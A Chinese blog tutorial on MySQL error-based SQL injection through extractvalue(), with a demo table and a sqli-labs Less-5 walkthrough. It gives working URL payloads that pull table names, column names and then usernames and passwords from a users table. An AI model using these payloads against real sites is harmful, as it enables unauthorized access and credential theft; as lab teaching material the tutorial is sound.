SQL注入——extractValue()报错注入

最新推荐文章于 2024-03-31 15:18:21 发布
最新推荐文章于 2024-03-31 15:18:21 发布
阅读量2k 收藏 16
点赞数 5
分类专栏: owasp十大漏洞学习 文章标签: sql 数据库 mysql 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/heyingcheng/article/details/129348113
版权

目录

 一,注入原理

 二,实例(less-5)

 一,注入原理

函数extractValue()包含两个参数:

第一个参数是XML文档对象名,第二个参数是路径

以创建数据库ctfstu和数据表xml为示例,展示函数extractValue()的用法

1,先在ctfstu数据库内创建表xml

create database ctfstu charset utf8;
create table xml(doc varchar(150));

2,再在表中插入两段数据

INSERT INTO xml values('
                       <book>
                       <title>A bad boy how to get a girlfriend</title>
                       <author>
                       <initial>LOVE</initial>
                       <surname>benben</surname>
                       </author>
                       </book>
                       ');

INSERT INTO xml values('
                       <book>
                       <title>how to become a bad boy</title>
                       <author>
                       <initial>hualong</initial>
                       <surname>melton</surname>
                       </author>
                       </book>
                       ');

 3,使用extractvalue查询xml里面的内容

比如:

查询作者是谁:

select extractvalue(doc,'/book/author/surname') from xml;

查询书名:

select extractvalue(doc,'/book/title') from xml;

报错注入的突破口就是让页面上显示报错。

比如在本例中把查询参数的路径写错,页面上只会显示查询不到内容,但是不会报错。

但是如果把查询参数的格式符号写错,页面上就会提示出报错信息:

由于路径错误,报错信息中显示出了路径信息。

于是我们想到,如果在报错之前执行一下select语句,然后在报错提醒信息那里回显出我们想要的数据信息就好了,这就是报错注入。

于是构造出一句:

注意:

在实际的注入过程中,查询的列(比如本例中的doc)是不用管的,随便写就可以。因为我们关注的是后面查询的更重要的东西(database)

0x7e就是~,concat函数是拼接的作用。作用是在执行这条命令时遇到前面的飘号~(0x7e)从而引起报错。

select extractvalue(doc,concat(0x7e,(select database()))) from xml;

如图回显出数据库的信息

 

 二,实例(less-5)

利用extractvalue()报错注入

...尝试用union注入的方法拿数据,发现失败如下:

?id=-1' union select 1,2,extractvalue(1,concat(0x7e,(select database()))),3 --+

 

 获取所需表名users:

?id=-1' and 1=extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) --+

获取所需数据列名username和password

?id=-1' and 1=extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))) --+

注意:报错注入默认值能返回32个字符串,所以我们需要用到substring函数

举个例子:

substring(123456,1,3)

这条命令的意思是,想要显示的内容123456,这句话的意思是从第一个字符开始显示,显示后面的三个,即123

下面这条命令的意思是从第一个字符开始显示,显示后面30个字符

?id=-1' union select 1,2,extractvalue(1,concat(0x7e,substring((select group_concat(username,password) from users),1,30)))

 同理,从第31个字符开始显示,显示后面的30个字符。最终的结果拼接起来,就是我们想要的数据。

 

是小何不是小盒呀
关注
  • 5
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL 注入天书.pdf
08-06
SQL 注入学习天书
学习基于extractvalue()和updatexml()的报错注入
热门推荐
超人学飞的日子
06-09 5万+
extractvalue()extractvalue() :对XML文档进行查询的函数其实就是相当于我们熟悉的HTML文件中用 &lt;div&gt;&lt;p&gt;&lt;a&gt;标签查找元素一样语法:extractvalue(目标xml文档,xml路径)第二个参数 xml中的位置是可操作的地方,xml文档中查找字符位置是用 /xxx/xxx/xxx/…这种格式,如果我们写入其他格式,就会报...
SQL注入——基于报错的注入【extractvalue()】篇
最新发布
2301_76437855的博客
03-31 269
这种格式,如果写入其他格式就会报错,并且会返回写入的非法格式内容,错误信息如:XPATH syntax error:'xxxxxxxx’。:extractvalue() 函数所能显示的错误信息最大长度为32,如果错误信息超过了最大长度,有可能导致显示不全。基于报错的注入,是指通过构造特定的SQL语句,让攻击者想要查询的信息(如数据库名、版本号、用户名等)通过页面的错误提示回显出来。常用的报错功能函数包括extractvalue()、updatexml()、floor()、exp()等。
SQL报错型注入原理-详细讲解 extractvalue()、updatexml()、floor() 的报错原因
大大大蜜蜂的博客
10-12 4660
SQL报错型注入原理 一、xpath语法格式错误的报错: mysql5.1.5版本中添加了extractvalue()、updatexml()函数,它们两个分别能够对XML文档进行查询、修改操作,下面分别对这两个函数进行介绍。 这里是MYSQLextractvalue()和updatexml()的官方介绍 1、extractvalue(xml_frag, xpath_expr):从一个使用xpath语法的xml字符串中提取一个值。 xml_frag:xml文档对象的名称,是一个string类型。 xpat
sql注入攻击流量情况
07-18
sql注入攻击流量情况
SQL注入——mssql注入
01-19
1、Mssql权限问题 Mssql角色: 服务器角色–针对运行整个数据库服务器设定的角色和权限。 数据库角色–针对某个特定数据库设定的角色和权限。 固定服务器角色    sysadmin             可以在 SQL Server 中执行任何活动。 serveradmin  可以设置服务器范围的配置选项,关闭服务器。 setupadmin 可以管理链接服务器和启动过程,并执行某些系统存储过程(sp_serveroption)。
extractvalue报错注入
bangyan3903的博客
08-18 3464
查看源码 $uagent = $_SERVER['HTTP_USER_AGENT']; ………… $uname = check_input($_POST['uname']); $passwd = check_input($_POST['passwd']); ………… $sql="SELECT users.username, users.password FROM users...
基于联合查询的字符型GET注入
Z_l123的博客
02-16 977
1.访问SQLi-Labs网站 访问Less-1,并根据网页提示给定一个GET参数 http://127.0.0.1/sqli-labs/Less-1/?id=1 2.寻找注入点 分别使用以下3条payload寻找注入点及判断注入点的类型: http://127.0.0.1/sqli-labs/Less-1/?id=1' 运行后报错! http://127.0.0.1/sqli-labs/Less-1/?id=1' and '1'='1 运行后正常显示! http:/.
sql盲注_extractvalue报错注入
sugar_by的博客
06-02 945
什么是报错注入 这是一种页面响应形式,响应过程如下: 用户1在前台页面输入检索内容------>后台将前台页面上输入的检索内容无加区别的拼成sql语句,送到数据库执行------->数据库将执行的结果无加区别的显示到前台页面上 俩个“无加区别”后台对输入输出的合理性没有做检查 也就是说输入进去的内容和输出的内容不做检查的 那什么时候用报错注入呢? 构造语句,让错误信息中夹杂可以显示数据库内容的查询语句 返回报错提示中包含数据库中的内容 命令对但是不回显 但是报错是......
sqli-labs less-1(报错注入extractvalue)
不知名白帽的博客
07-16 471
sqli-labs less-1(报错注入extractvalue)
SQL注入-extractvalue报错注入
weixin_52613207的博客
06-11 412
出现报错注入的原因:报错注入是一种页面的响应形式,用户在前台页面输入检索内容,后台将前台页面上输入的检索内容无加区别地拼接成sql语句,送给数据库执行,数据库将执行结果返回给后台,后台将数据结果无加区别地显示到前台的页面上,简而言之就是后台对于输入输出的合理性没有检查。什么是报错注入:构造语句,让错误信息中夹杂可以显示数据库内容的查询语句什么时候使用报错注入:查询无回显位的时候,使用报错注入(如图)
sql注入绕过方法总结
12-19
sql注入绕过方法总结,绕过waf,D盾
pangolinsdl—sql注入工具
06-20
pangolinsdl—sql注入工具 很好用的sql注入工具 界面简洁好用 使用方便
Oracle中对XMLType的简单操作(extractextractvalue
fengzhongdeluoyea的博客
09-01 2648
前几天一直在做Oracle对XMLType字段的操作,我还不是Oracle大拿,到网上找了很多资料,但是很多就是单一功能的介绍,不能很好的解决问题,现在在这里总结下。 1、下面先创建一个名未test.xml的配置文件。 <?xml version="1.0" encoding="UTF-8" ?> <collection xmlns=""> <record> <leader>-----nam0-22-----^
SQL注入——基于报错的注入(1)
qq_52072846的博客
02-18 2466
实验目的 熟悉报错功能函数extractvalue的用法,掌握基于报错的SQL注入基本流程 实验原理 (1)关于报错注入 基干报错的注入,是指通讨构造特定的SOI语句,让攻击者想要查询的信息(如 数据库名、版本号、用户名等)通过页面的错误提示回显出来。 报错注入一般需要具备两个前提条件:(1)Web应用程序未关闭数据库报错函 数,对于一些SQL语句的错误直接回显在页面上:(2)后台未对一些具有报错 功能的函数进行过滤。 常用的报错功能函数包括extractvalue()、updatexml(、fl
报错注入分析之Extractvalue分析
aiquan9342的博客
01-04 1039
Extractvalue(这单词略长,拆分记忆法extract:提取物 value:值) 上一篇说的是updatexml。updatexml是修改的。而evtractvalue是查询的。 用法与updaxml类似。 同updatexml一样,限制长度也是32位。 函数解释:  extractvalue():从目标XML中返回包含所查询值的字符串。  EXTRACT...
sqli-labs-less-17 extractvalue报错注入
yzcn
11-13 268
Less-17 extractvalue报错注入 找寻注入点: 首先用burp suite抓包,得到post信息后,用hackbar进行测试 经过测试发现,无论怎样对uname进行测试,都显示失败,猜测是对uname进行了过滤,我们考虑从password进行注入: 该关卡是对密码进行更改,如果用户名正确,则修改密码为新密码,如果用户名错误,则返回失败, 因此该关卡需先知道一个用户名admin Sql知识: extractvalue(xml_frag,xpath_expr)使用xpath表示法从xml字符串中
sql报错注入extractvalue、updatexml报错原理
weixin_30642267的博客
03-07 730
报错注入extractvalue、updatexml报错原理 MySQL 5.1.5版本中添加了对XML文档进行查询和修改的两个函数:extractvalue、updatexml 名称 描述 ExtractValue() 使用XPath表示法从XML字符串中提取值 UpdateXML() 返回替换的XML片段 通过这两个函数可以完成报错注入 一、extractvalue函...
extractvalue报错注入理论及实战
走马
11-07 563
什么是报错注入构造语句,让错误信息中夹杂可以显示数据库内容的查询语句,返回报错提示中包括数据库中的内容如上图所示,通过group by的报错,我们可以知道列数是多少输入正确的查询数据库SQL语句,虽然可以执行成功,但是页面不显示数据库的名称我们故意将database写为databasa,此时数据库的名称security在报错信息中显示了出来因此可以利用报错的信息得到我们想要的信息。1.通过floor()报错注入2.通过extractvalue()报错注入
extractvalue报错注入需要猜解字段吗
05-30
是的,使用 extractvalue 函数进行注入时,需要先猜解出目标数据库中的字段名和表名,才能进行注入。因为 extractvalue 函数需要指定要查询的字段名和表名,如果不知道这些信息,无法进行有效的注入。因此,常见的 SQL 注入攻击手段之一是通过一些技巧来猜解出目标数据库中的表和字段信息,例如使用 union 查询、错误信息提示等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值